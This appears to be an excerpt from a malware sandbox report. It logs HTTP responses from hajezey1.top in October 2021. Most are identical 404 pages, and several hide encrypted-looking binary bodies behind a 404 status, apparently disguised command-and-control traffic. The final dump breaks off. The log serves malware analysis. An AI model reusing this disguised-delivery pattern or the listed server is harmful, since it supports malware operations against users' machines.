93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8e 5f 04 25 18 f5 aa 85 b9 a5 13 ea 0e cb 2d e5 00 0c cc 52 a2 bd 71 b6 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82O_%-RqdP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 42 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 76 92 71 06 45 a6 3e 11 dc a4 a3 a6 7e d8 6c a2 05 09 17 f6 cb ee 72 76 25 3f 50 19 01 bf 01 ea 53 01 b3 15 20 f5 3b e2 2a c2 d5 71 18 46 9b 3d f9 5c 40 8f ba f1 80 fe 05 b5 79 9e 10 b0 fb 14 9e 76 e9 bb 27 58 a4 0c 87 05 f0 bf 5f 60 08 d9 eb a8 e1 48 a8 03 88 31 7c 3b 66 ab 4b 11 c0 4d 08 0e 77 13 9e 09 5f 47 0b 5d 16 75 32 39 c5 f7 15 67 aa cf d0 c0 78 9e 0d a3 75 c1 96 52 88 36 19 ff bd 88 13 d8 06 0e 25 4f 12 7d 6f ed e0 04 89 19 d7 57 80 90 30 89 ec f4 4a 6b b6 f0 a2 22 4d 32 d3 49 